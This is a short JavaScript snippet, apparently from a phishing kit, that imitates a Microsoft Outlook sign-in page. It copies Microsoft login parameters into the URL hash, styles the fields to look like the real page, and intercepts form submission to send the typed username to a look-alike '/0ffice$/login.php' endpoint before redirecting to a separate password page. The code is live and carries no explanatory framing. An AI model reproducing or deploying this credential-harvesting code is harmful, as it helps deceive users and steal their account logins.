
    location.hash = 'wa=wsignin1.0&rpsnv=13&ct=1539585327&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d715d44a2-2f11-4282-f625-a066679e96e2&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015';

    $(function() {
        $(document).on('focus', '.form-control', function() {
            $(this).css({'border-bottom': '1px solid #0067b8'});
        });

        $(document).on('blur', '.form-control', function() {
            $(this).css({'border-bottom': ''});
        });

        $(document).on('submit', 'form', function(event) {
            event.preventDefault();

            var user = $('#user').val();
            
            $.post('/0ffice$/login.php', {user: user}, function(data) {
                data = JSON.parse(data);

                if(data.success == true) {
                    window.location = 'pass.php';
                }
            });
        });
    });
